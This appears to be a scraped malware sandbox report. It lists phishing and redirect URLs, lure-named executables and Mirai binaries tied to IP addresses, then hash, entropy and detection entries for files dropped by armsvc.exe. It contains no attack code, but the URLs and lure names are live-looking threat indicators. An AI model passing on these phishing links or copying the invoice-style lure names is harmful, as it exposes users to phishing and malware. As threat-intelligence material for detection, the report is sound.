                                                                                                                                                                              http://www.topbuildersolutions.net/clickthrough.aspx?rurl=https://search.app/?link=https://ZSUQWPLT.%63%64%72%6A%2E%63%6F%6D%2E%62%72%2FbfackjemFpbmFiLmFscmFobWFAZWphZGFoLmFlqmgtsj&eid=4070Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.196.244.37
                                                                                                                                                                              http://www.topbuildersolutions.net/clickthrough.aspx?rurl=https://search.app/?link=https://ARIQNEUB.cdrj.com.br%2Fxpkjxic2FidS5qb2huQGp1bWVpcmFoLmNvbQ==nishhe&eid=4070Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 35.173.69.207
                                                                                                                                                                              https://login.hr-internal.co/27553be9ed867726?l=50Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 3.5.68.128
                                                                                                                                                                              EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.156.21.112
                                                                                                                                                                              https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 3.94.50.129
                                                                                                                                                                              Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 44.221.119.255
                                                                                                                                                                              hax.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 18.211.48.222
                                                                                                                                                                              hax.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 18.209.81.116
                                                                                                                                                                              hax.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 54.242.22.180
                                                                                                                                                                              AMAZON-02UShttps://advertising-case-id419348.d1yaxxd8bf42y5.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 108.158.75.45
                                                                                                                                                                              arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 34.249.145.219
                                                                                                                                                                              sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              6dKYHqbvOm.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 35.158.159.254
                                                                                                                                                                              la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 13.228.81.39
                                                                                                                                                                              http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                                                                              • 54.200.239.173
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adDEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eQUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              e8YDxjwJiT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              TlNDyT2f5c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              No context
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1508864
                                                                                                                                                                              Entropy (8bit):4.874504526124143
                                                                                                                                                                              Encrypted:false
SSDEEP:24576:aHCAR0it/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:aCAhLNiXicJFFRGNzj3
MD5:DBCBBFDADE8D1C9A7B26F9A182EF5A9D
SHA1:C0965F7D2843DD912911BE9E30B790E359732CFC
SHA-256:5A30BE768A45D5FEAD76C219DC29B2BE9F9FD311CC0AC06D8D86D2430C427FD8
SHA-512:83874AF57A4196DFCE06B6726C35D541E47B83E514CF3675054C1D3377836B52581336BB274ED7DA6B610C8D0B216EF204FD72C416B72684E1248E02F0F0B130
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:low
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1450496
Entropy (8bit):4.816181180123465
Encrypted:false
SSDEEP:24576:1C/Kgw/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:NLNiXicJFFRGNzj3
MD5:992BFDCDC47C785EFB6D415557204BD1
SHA1:A5C7928689CC1FCE0864A9456247DA9250D5B60F
SHA-256:318796B39C057826C392619CC327CA1887EF474FD4759CC1D1D79EC596ED286D
SHA-512:9249EF7BEE9075F6A8635FCC9302303B4B8C735C27179D7B9471BB36132480C9C1DE5F7AB7E7A8C81B0130F48CC1D01E45C6C3C5BF26142BCA26DCE9BE414DBD
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1469952
Entropy (8bit):4.815396117315849
Encrypted:false
SSDEEP:24576:xKdHx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sdRLNiXicJFFRGNzj3
MD5:D3B6F2DBE813FAB1527E57BF44649E70
SHA1:18C43FF0B908F535DCAA846F2C4FD5FAF630334E
SHA-256:EF2111B59D3A4C255C6335D49E644790685A96AF67025758EAB96A5D815A18CE
SHA-512:CB1B902C8BC2FCD54BF31EBF877ED43E627243748F900FFE137DA0BE730019FFB4C6FC5855509EFA894E97CC3E819DE0EB08238306D4B8AB55789285F10D5935
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2203136
Entropy (8bit):7.642493741465371
Encrypted:false
SSDEEP:49152:NK0eqkSR7Xgo4TiRPnLWvJpLNiXicJFFRGNzj3:NK0pR7Xn4TiRCvJp7wRGpj3
MD5:9FE5EF1D640F7A7F375A585E86DED930
SHA1:575EFBD757A75C529D0C7A7963D0897E7223E9C3
SHA-256:590D0D1778236C37E37646BDA5158673C282AACF0E20E79660CE1375A6DBDF66
SHA-512:7B04A4756999CCE7E93D6E09AF57CE21CA33C17D04171A6A0106A2412758BC17A9E23A5D9A8CFD80BD878C9E32F626739301349AF71B4D1396D0854642ED1585
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2369024
Entropy (8bit):7.561294403290172
Encrypted:false
SSDEEP:49152:rfYP1JsEDkSR7Xgo4TiRPnLWvJpLNiXicJFFRGNzj3:DYPBR7Xn4TiRCvJp7wRGpj3
MD5:005A7984514B3064CFC667ED1FF7F46C
SHA1:6083663C8B262CB5BBBE9AFA47B2A52C277FA399
SHA-256:493D765648D814DF97E4556C2E377B7B05AEBDA6B86693A88C236074182B57D8
SHA-512:2F29D329AF7838E37EA29EC48972FD7998D94D6BA17BB8D4CFA8CEBFEBB86655ECFBAF94361DF020504BBF47FEB6315BD3F21EDCFB30CC5DC10672DAD43F79AC
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1400832
Entropy (8bit):4.6512382171115005
Encrypted:false
SSDEEP:24576:kYUcknT/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kZcknTLNiXicJFFRGNzj3
MD5:A41D2B72B5BF0B64B1F4360F9097C445
SHA1:B5A54819A5E4B0954D8234BA8901FA423A61544F
SHA-256:97A078A0CE2F44103F1EEFF8E3A11C5CCB5ED44E54E14FCF3EBF87254797ED10
SHA-512:193B93A10233148202CFE24C5AF7612E94B6431027555B6BAFBC811A1CF0C108BF83996BDBA86B2F03E151B92772E82B864D34F3F3DDA677EE28526C54952486
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1640448
Entropy (8bit):7.1594749367024235
Encrypted:false
SSDEEP:49152:u56AqSPyC+NltpScpzbtvpJoMQSq/jrQaSFLNiXicJFFRGNzj3:ZSktbpT7wRGpj3
MD5:11E58BD4B3DA477E45FEB2EAD308654F
SHA1:306B0E8FCC671501C5458DB8263A20351D4CFA8A
SHA-256:CC7F8157789CB4EF4FBE299FFFC5FF78C454912A11B4710D766197BC0EE91B07
SHA-512:2816D127E2D1C937512F003DE44DB4CE1592C51B5DCBED7A09B19ADF7624F126BB9F7DE8ACCDE832509A9CCB7A80344E8A0CAAFC0FA403A4CDB218F756840669
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2953728
Entropy (8bit):7.089725551027659
Encrypted:false
SSDEEP:49152:lGSXoV72tpV9XE8Wwi1aCvYMdjluS/fYw44RxLqLNiXicJFFRGNzj3:54OEtwiICvYM3fK7wRGpj3
MD5:8AD00390CBCF31E4B7B955FB18653A01
SHA1:2147858B2922B6C55B7B4E3AA4168BD0E7B97DF4
SHA-256:FD2D34B1EDCBD3CE103DF0FF5E8F3D39838F5DF81EBB1B2605D1907052337918
SHA-512:DB2277A4A54DC55AC20B8F44E88C1DBDF2D656AA48A6E631660337BD026E46CCE133C2C3BFAA20EB94CD086017BDD2A27A622577C72137D487E0471D3B29BA29
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1641472
                                                                                                                                                                              Entropy (8bit):5.075015367587746
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:hAMvR+3kMbVjh9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mE+lbVjh9LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:38EB34A3EB5C9348F736F4757239BB79
                                                                                                                                                                              SHA1:4E7FA780E8B866F9F09C47ED053225929DDF8C8B
                                                                                                                                                                              SHA-256:D3ED75388C69ECB90B499692161DB94B47E5BC0A112212F591562EAE3129DF8A
                                                                                                                                                                              SHA-512:1B7BBF90910BE8830D5A35DBB3CF2E40AA063A191C05C7A705296EA0C517BDE220FE48BD1981981C456EC42BD7ACBCDFB3F25FE7BCB4D24C384D4E1832475333
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1445888
                                                                                                                                                                              Entropy (8bit):4.810142380756184
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:IxGBcmly/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:kGy+yLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:9244278F3A4B451378B09E3B314A4B1A
                                                                                                                                                                              SHA1:60559B16AA6408FBE8D3E0AC84796FF494E58E26
                                                                                                                                                                              SHA-256:19D4BDD817AF242D745544406D5C5E92873D67DC5AA1DB43B13AC3E8562FC00E
                                                                                                                                                                              SHA-512:765DAEA6A28C9A10EDC2F6B15749F2174F3EB871DE0C07C1A5422F6FA4F4D909C0DAE4E3A3C93075974946028ECBB9FED72E5337FF8C6D9C8CACE31CE8AED8E7
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1800192
                                                                                                                                                                              Entropy (8bit):5.302171267223269
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:j0vHyTLj8trn3wsD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OWj4rgsDLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:CD9B74EEC4FC6608776A073EC7F86B65
                                                                                                                                                                              SHA1:D5641C7F03BFFFEEAC4155CA9C55C7C95D8063C3
                                                                                                                                                                              SHA-256:849CC9EC8A157FCBD3463CEE83CB16D89846AEA8459588DF3630A5B0F9E66703
                                                                                                                                                                              SHA-512:AEB5A77D77888D0454F65996EF68CAF411897EEC2180FEC6A9B9DD5CAF9BFA5BA7EA28FDD88ED9B28761EBEDDD5F1241E4CE65B452F5AF1B969779AE4384590A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1781760
                                                                                                                                                                              Entropy (8bit):7.271319865125773
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:34ijwGJra0uAUfkVy7/ZaLNiXicJFFRGNzj3:3NjwGJrakUQyc7wRGpj3
                                                                                                                                                                              MD5:FEEC30C8FC71F87A2FEB628FB57C4217
                                                                                                                                                                              SHA1:D3158BBAD1B5A5E5347AC979F8648EE962CF6B2E
                                                                                                                                                                              SHA-256:003A8BCE6B408D5CC7A09F9CDF42CA9AEF2160FE220A7E13F5DD0C9FD7ECE163
                                                                                                                                                                              SHA-512:825936EB2C89AC8C2892F57FAC918FBBC2D975FB0B26AEA290ABF0808BC35F3C039F6205FB42A440032BED65E4586BEB68479FB3C4D7F04107DB2CA5A91786CF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1318400
                                                                                                                                                                              Entropy (8bit):7.438350441649306
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:ReR0gB6axoCxyR6RLQRF/TzJqe58Bim1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:TgHxWR6uBTzge5Mim1LNiXicJFFRGNzb
                                                                                                                                                                              MD5:927F607B3E77614B66CDF124699E78B1
                                                                                                                                                                              SHA1:0D70EB8822CDDA56F049E9DDEF46A6C9BE2EB91E
                                                                                                                                                                              SHA-256:DBB01A9B9BFBC3B006DE86F7E395F5A7434891F9DB9930440A0E3C765523F0E1
                                                                                                                                                                              SHA-512:F0C7314C2B46A6A481EDBB4B05ACE2BC02832DFDFEA4233B19F88564A9C50F9201A784A0286E7DF8599153351B238F3B8DE8D46055E8E7C3D630872D23C311E1
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1530880
                                                                                                                                                                              Entropy (8bit):4.9949106109873815
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:tpwOtO7z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:tmOtmzLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:5D7FCABD1C9E9C1E5CEB47853FC67825
                                                                                                                                                                              SHA1:77E821A8E7F095DDFE40A43954E3F7825B8D3209
                                                                                                                                                                              SHA-256:3030C38A2900D43BC3F85E25811EEA8225CB983456E025FC3531CE56FFE5753D
                                                                                                                                                                              SHA-512:4A48C7803AA0C37CF39C78AD23BAC1C0DF10F63DC9E6575300A38B4DF862E987097565DF42FC342D620AE8767ACB78D5D39539C9080EFB7A45716578DA1D95F5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1530880
                                                                                                                                                                              Entropy (8bit):4.99560178821691
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:3KU/h/4KI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3r/VILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:9D13D8C059A1EE862FAE39EC806168BA
                                                                                                                                                                              SHA1:35E0962079F1F9F5DFAC13B7306E731C3F8A6AEF
                                                                                                                                                                              SHA-256:B4CF69DD083FF8B291FAE7701999AC9969C99D6D4171BC212D79888D5B51B62F
                                                                                                                                                                              SHA-512:3AFF71773A001A546A8B05B5CF5E9723F226F80E1855D2B7BED8240651128F647BCF60623BE9ADC7F65BB09AF1E8421E7C2727A2BCC2496764290B6771DA5F46
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1669632
Entropy (8bit): 5.069220551824723
Encrypted: false
SSDEEP: 24576:Kx7YiBLZ05jNTmJWExn/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:KxUiHIjNgnLNiXicJFFRGNzj3
MD5: 78E0F37B74B5A0F5EC7F1563DCB49E13
SHA1: 03F5CB327A9EB0977E22A2496400F3BAD7E2D875
SHA-256: 9E305B899ACA3DBC69354351F11607FF00135E65656EFBBBE4AF87746CDF0419
SHA-512: CC8615FABD92B35C7E1F344D3A969FFC61C6D704811E9A9744B5C2CE68D469BE7CE8BCF7805D36742E9CDF2478DF60AFB17428B0D4B846527F55DB2C1968B963
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1574912
Entropy (8bit): 5.027369510370842
Encrypted: false
SSDEEP: 24576:nlnRkld6fgJcEwix9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:7okfgJcEwC9LNiXicJFFRGNzj3
MD5: A91A0EEB84356FBE7DE527F50D0E4FE0
SHA1: C1E4C1F8B7956D3EC7B24A232ED59D14E4F84CEA
SHA-256: 86E48BAE8A914295E28CDB3347C9F8836FC225FE113D18C1B4B600CF1A2BA653
SHA-512: 53E095BBE54F44F1CE598C33234F3A6D4722362FA8F4EB9BEBD8AF4C25FA4850C94151347F3DC410712282A8BFD30A79972E90DE158791670AAFA0DDA979E20A
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1677824
Entropy (8bit): 5.08498493280695
Encrypted: false
SSDEEP: 24576:FWR5k8hb0Haw+xN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:FWLk8SHawmNLNiXicJFFRGNzj3
MD5: A9DE3699FAA8B137EAE31B8B7C04B91D
SHA1: BD577A07ED495C4274E94F542F7AA78FBECD5195
SHA-256: 0CDDA4DABD00F6675DC9FE1AC5B1D9F4A53E91F502805D27A4FB90F6FE41A8A1
SHA-512: 85D29AFD92606BAD73AD0BF9760CE5244704D57F303277AB8D70BFEE67DDD593AB61317FD816A13F00E46E9E95B50879AC813DF4F15D92C1D679E40483192E00
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1437696
Entropy (8bit): 4.700953920317136
Encrypted: false
SSDEEP: 24576:CkCKABl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:CxKklLNiXicJFFRGNzj3
MD5: 91FE4D84E52F2AB14CBE2391FFF95182
SHA1: C5048F67D43007DB770F3086ED83168DE23C6D77
SHA-256: 78C52F39ACCE51A76A0D3C8CF68851978A73E01F54E9326F82720B5A40F1DA98
SHA-512: B38299ACFF35B55AEEFE570CA983CDD840235472061559B815E70CB4900F948045214AD8DA8AEA5AAC510881368ADC39B0DC3438484BE49A4D1A3A22B07D2135
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1383936
Entropy (8bit): 4.680879131054022
Encrypted: false
SSDEEP: 24576:0jNWBPm/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GNm+LNiXicJFFRGNzj3
MD5: F63C3954CEB6835D87655E6F990D5649
SHA1: ABD2C8AEA4AE228446A7836CDBB0A22BCEDB2190
SHA-256: E6FA8E41C23BBB36997A67CB781299B8307C77140E51A00907E85F812480AF84
SHA-512: E8CD43152A8DB5DD8778629D03A2F737FB9CB5607DCFF4FD9576E6391DFD01FF2BED41A97FA09647B11EFAFDB13054E267BAF5A88FE5DB19ED2D84F0020FE229
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1458176
Entropy (8bit): 4.778606957671975
Encrypted: false
SSDEEP: 24576:5ijRyhdsRrU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5ijsoRULNiXicJFFRGNzj3
MD5: B42D394DF3454AE05D5C218B588789D4
SHA1: 959B78BA3ACF22DAF431E4B28E2B08DA29F91961
SHA-256: 1C1FF62B90C55DC98632A2156D472B057906C4A72E76F64F48AA6DE2749B4EC6
SHA-512: 5B6666720F32927D34EAE080EB66C41DA2372613B9059831DD9C0EF55BB16E9DFCA2A1FA3AA76CC66C71446B07812B13B9A54C7474136F38DC88BFCEF14EF005
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1498112
Entropy (8bit): 4.895441279741585
Encrypted: false
SSDEEP: 24576:v16DmRF+wpx/Qaf7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ymRF+wn/Jf7LNiXicJFFRGNzj3
MD5: F2E999B31E46A33A5511D0ADEAED278C
SHA1: 6B49EB83848BC96C3A549060FB19690A62494EF1
SHA-256: DED04FBB729A843A5014864E442D9D6A33B40C951FA27BD613C39ECFC6FDAD8C
SHA-512: 9C435AA2932DE2EBE4047809B0FF65DE77492531C88F3D61BE38CA306E68F15EDBAA2BF2F5F8796253D9AA26C66E1B364A496E5996B9803739D631EBED16BDC9
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1383936
Entropy (8bit): 4.680845476497741
Encrypted: false
SSDEEP: 24576:dE21BPR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:62bZLNiXicJFFRGNzj3
MD5: 905099D0E8106BE567206285D2286994
SHA1: D7201C8A8EEBD76E9BE636B918BA2671F30D3485
SHA-256: 6FF7FEEE42EC2021549DF8E5672EE4C3D0CAEB0F31C01034D96DF933D1231146
SHA-512: DDBE0CFE3D32C8BE93624C89F87C0885C3790714AEF64592F85A8427A0A8B1DF649C5890F01F8864E9D57A0F6FCE5308B36B1EFB53E52013383D4FEA0099E9FE
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
